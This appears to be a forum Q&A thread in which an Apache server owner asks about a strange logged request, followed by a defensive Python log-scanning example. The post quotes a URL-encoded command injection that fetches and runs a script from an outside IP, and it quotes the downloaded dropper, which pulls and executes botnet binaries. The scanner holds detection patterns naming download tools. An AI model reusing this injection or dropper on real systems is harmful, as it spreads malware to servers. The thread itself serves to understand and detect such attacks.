linux
Type Programmer, 2018-08-28 18:55:49

What are these strange requests to the website?

I have an Apache web server running. Out of curiosity, I decided to look at the logs in /var/log/apache2/access.log
There is a strange request there:

"GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.171/bin%20-0%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"

For fun, I decided to take the IP from the request and enter it in the browser: http://176.32.33.171/bin
A file with the following contents was downloaded:
n="kenjiro.arm kenjiro.arm7 kenjiro.mips kenjiro.mpsl"
http_server="176.32.33.171"
dirs="/tmp/ /dev/ /dev/shm/ /var/ /var/run/ /var/tmp/"

for dir in $dirs
do
 >$dir.file && cd $dir
done

for i in $n
do
 cp $SHELL $i
 >$i
 chmod 777 $i
 wget http://$http_server/$i -O- >$i || curl -O http://$http_server/$
 chmod 777 $i
 ./$i
done

There was already something like this before that; the content, if not identical, looked very similar, I don't remember exactly. But the file name was different.


1 answer(s)
Stalker_RED, 2018-08-28
@MegaCraZy6

Chinese bots have found you and are trying to upload shellcode or a virus to you.
RUN!
To answer in advance the question "how did they find me?":
It takes about 25 minutes to scan ALL IPv4 addresses on one port (80?). They were not looking for you personally, but for any web servers in general. And everyone is trying to sell the virus. And it's not just the Chinese who do this.
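
A defender-side check for requests like the one quoted in the question, added here as an example (not code from the thread): it URL-decodes each request in an Apache access log and flags a shell separator followed by a download tool, reporting the payload URL. The combined log format, the constructed sample lines with documentation addresses, and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# A shell separator (or "$(") followed by a download tool and whitespace,
# the shape of the request quoted in the question.
INJECT_RE = re.compile(r'(?:[;|&`]|\$\()\s*(?:wget|curl|tftp)\s', re.I)
URL_RE = re.compile(r'https?://[^\s;\'"]+', re.I)

def inspect(line):
    """Return a finding for a log line carrying a download-and-run injection, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m["request"])  # %20, %27 etc. hide the shell syntax until decoded
    if not INJECT_RE.search(decoded):
        return None
    return {
        "client": m["host"],
        "status": int(m["status"]),  # 400 here means the server rejected the request
        "agent": m["agent"],
        "payload_urls": URL_RE.findall(decoded),
    }

def scan(lines):
    """Run inspect() over an iterable of log lines and keep only the findings."""
    return [f for f in map(inspect, lines) if f]

# Constructed sample lines (documentation addresses, not taken from a real log).
SAMPLE = [
    '203.0.113.9 - - [28/Aug/2018:18:40:01 +0300] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [28/Aug/2018:18:41:13 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20'
    'http://192.0.2.50/bin%20-0%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"',
    '203.0.113.9 - - [28/Aug/2018:18:42:30 +0300] "GET /search?q=wget%20manual HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with a 2xx status deserves more attention than the 400 in the question, since it means the request reached a handler instead of being rejected.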
